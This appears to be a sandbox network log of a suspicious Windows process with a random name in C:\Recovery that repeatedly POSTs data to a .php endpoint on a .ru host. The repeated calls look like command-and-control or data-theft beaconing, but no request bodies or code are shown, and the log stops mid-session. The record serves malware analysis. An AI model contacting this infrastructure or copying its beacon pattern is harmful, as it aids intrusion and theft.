                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    55 | 192.168.2.4 | 49833 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:08.327939987 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:08.673830986 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:09.152043104 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:09.231482983 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:07 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    56 | 192.168.2.4 | 49838 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:09.360687971 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    57 | 192.168.2.4 | 49841 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:09.616775990 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:09.969501019 CET | 1276 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:10.463767052 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:10.538990021 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    58 | 192.168.2.4 | 49842 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:09.740973949 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:10.094511032 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:10.555252075 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:10.627149105 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:08 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    59 | 192.168.2.4 | 49850 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:10.753793955 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:11.112481117 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:11.564965963 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:11.643349886 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:09 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    60 | 192.168.2.4 | 49856 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:11.822204113 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:12.173727036 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:12.632369995 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:12.700288057 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:10 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    61 | 192.168.2.4 | 49863 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:12.888912916 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:13.235120058 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:13.698288918 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:13.773247957 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:11 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    62 | 192.168.2.4 | 49869 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:14.130297899 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:14.486221075 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:14.951869011 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:15.031677008 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:12 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    63 | 192.168.2.4 | 49875 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:15.240705967 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    64 | 192.168.2.4 | 49879 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:15.555893898 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:15.907191992 CET | 1276 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:16.377175093 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:16.447371960 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    65 | 192.168.2.4 | 49882 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:15.679666996 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:16.032032013 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:16.480392933 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:16.549379110 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:14 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    66 | 192.168.2.4 | 49888 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:16.800208092 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:17.157448053 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:17.601785898 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:17.676377058 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:15 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    67 | 192.168.2.4 | 49894 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:17.799554110 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:18.157037020 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:18.617922068 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:18.694787025 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:16 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    68 | 192.168.2.4 | 49900 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:18.830717087 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:19.188456059 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:19.641052961 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:19.713350058 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:17 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    69 | 192.168.2.4 | 49906 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:20.096970081 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1008
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:20.454619884 CET | 1008 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:20.906105042 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:21.413480997 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:18 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    70 | 192.168.2.4 | 49916 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:21.461157084 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1252
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:21.813373089 CET | 1252 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:22.262053967 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:22.340382099 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    71 | 192.168.2.4 | 49917 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:21.545860052 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:21.891655922 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:22.346046925 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:22.419670105 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:20 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    72 | 192.168.2.4 | 49923 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:23.055449963 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:23.407013893 CET | 1012 | OUT | [request body]
                                                                    Nov 6, 2024 03:38:23.875431061 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:23.946238995 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:21 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    73 | 192.168.2.4 | 49932 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:24.064076900 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:24.874880075 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:24.953320980 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:22 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    74 | 192.168.2.4 | 49938 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:25.619615078 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:26.428690910 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:26.505240917 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:24 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    75 | 192.168.2.4 | 49948 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:27.654742002 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1276
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:28.499973059 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:28.577785015 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive
                                                                    Nov 6, 2024 03:38:28.817426920 CET | 308 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 152
                                                                    Connection: keep-alive


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    76 | 192.168.2.4 | 49949 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:27.654814959 CET | 297 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Connection: Keep-Alive
                                                                    Nov 6, 2024 03:38:28.468159914 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:28.547694921 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP
                                                                    Nov 6, 2024 03:38:28.817550898 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:26 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    77 | 192.168.2.4 | 49955 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:28.874754906 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:29.685631990 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:29.759912014 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:27 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    78 | 192.168.2.4 | 49963 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
                                                                    Nov 6, 2024 03:38:29.897387028 CET | 273 | OUT | POST /providerimageUpdateGameDatalifelocal.php HTTP/1.1
                                                                    Content-Type: application/x-www-form-urlencoded
                                                                    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:94.0) Gecko/20100101 Firefox/94.0
                                                                    Host: 861848cm.nyashkoon.ru
                                                                    Content-Length: 1012
                                                                    Expect: 100-continue
                                                                    Nov 6, 2024 03:38:30.713701963 CET | 25 | IN | HTTP/1.1 100 Continue
                                                                    Nov 6, 2024 03:38:30.786015034 CET | 158 | IN | HTTP/1.1 200 OK
                                                                    Server: nginx
                                                                    Date: Wed, 06 Nov 2024 02:38:28 GMT
                                                                    Content-Type: text/html; charset=UTF-8
                                                                    Content-Length: 4
                                                                    Connection: keep-alive
                                                                    Data Raw: 32 56 59 50
                                                                    Data Ascii: 2VYP


                                                                    Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                                    79 | 192.168.2.4 | 49969 | 37.44.238.250 | 80 | 8152 | C:\Recovery\ROxqvkhuKqPawtyxZXXxveaCsizbJ.exe
                                                                    Timestamp | Bytes transferred | Direction | Data
